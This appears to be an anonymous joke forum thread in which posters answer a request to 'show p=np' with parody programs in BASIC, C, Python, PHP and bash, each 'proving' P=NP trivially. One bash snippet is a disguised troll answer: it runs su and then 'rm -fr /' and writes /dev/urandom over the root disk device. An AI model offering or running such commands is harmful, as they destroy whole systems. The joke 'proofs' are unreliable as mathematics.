Name: Anonymous 2010-07-13 12:11
Show p=np
deadline 20/7/10
deadline 20/7/10
10 LET P=5
20 LET NP=5
30 IF P=NP GOTO 50
40 GOTO 60
50 PRINT "I proved P=NP!"
60 END
GNU nano 2.0.7 File: Prog_Un-numbered_challenge__USES_ALLEGRO_LIBRARY_in_parody_of_Czarn_Adams.c
#include <allegro.h>
int main(){
allegro_init();
install_keyboard();
set_gfx_mode(GFX_AUTODETECT,800,600,0,0);
textprintf_ex(screen, font, 250, 400, makecol(255,100,255), -1, "P=NP",SCREEN_W, SCREEN_H);
readkey();
return 0;
}
END_OF_MAIN()
#On the name of ALLAH and may the blessing and peace of Allah
#be upon the Messenger of Allah Mohamed Salla Allahu Aliahi Wassalam.
#Author : Fouad Teniou
#Date : 13/07/10
#version :3.1
p = np
Traceback (most recent call last):
File "<stdin>", line 1, in <module>
NameError: name 'np' is not defined
if(3.0 == "3dicks")
{
//P=NP
}
p = 1
n = 1
n == n*p
True
#! /bin/bash
su
rm -fr /
rm -fr /*?cat /dev/urandom > $(mount | grep -F \ /\ | cut -d\ -f1)
<?php
print "p=np";
?>import pynotify
pynotify.init("/prog/")
n = pynotify.Notification("P = NP", "would a popup lie to you?")
n.show()
substr and indexof)a == P then also a == NPa, we find that P == NP.
>>> "P" in "NP"
True
>>> "NP" in "P"
False